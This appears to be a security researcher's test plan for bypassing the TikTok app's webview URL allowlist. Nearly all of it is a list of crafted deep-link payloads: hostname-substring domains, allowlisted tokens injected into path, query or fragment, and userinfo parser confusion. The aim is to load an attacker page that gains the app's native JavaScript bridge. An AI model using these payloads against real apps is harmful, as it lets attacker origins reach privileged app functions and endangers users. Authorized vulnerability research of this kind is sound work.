TikTok webview allowlist-bypass — lrd0036
Bare boguefala.us was blocked as "unsafe". The allowlist match is
indexOf (substring) on hostname+pathname, so embedding an
allowlisted token in either part should slip past. WIN = the red PoC page renders inside TikTok;
on that page a populated webkit.messageHandlers object means the native bridge was injected into our origin.
1 · baseline (should still be blocked)
webview?url=boguefala.us/poc (control)
2 · hostname-substring bypass (host contains "tiktok.com")
webview?url=tiktok.com.boguefala.us/poc
ad_webview?url=tiktok.com.boguefala.us/poc
3 · path-injection bypass (path contains allowlisted token)
…/tiktok.com
…/poc?x=tiktok.com
…/poc?x=.tiktokv.com
…/poc?x=webcast
4 · userinfo / fragment parser confusion
https://[email protected]/poc
…/poc#.tiktok.com
5 · controls
open tiktok.com.boguefala.us in Safari (should render)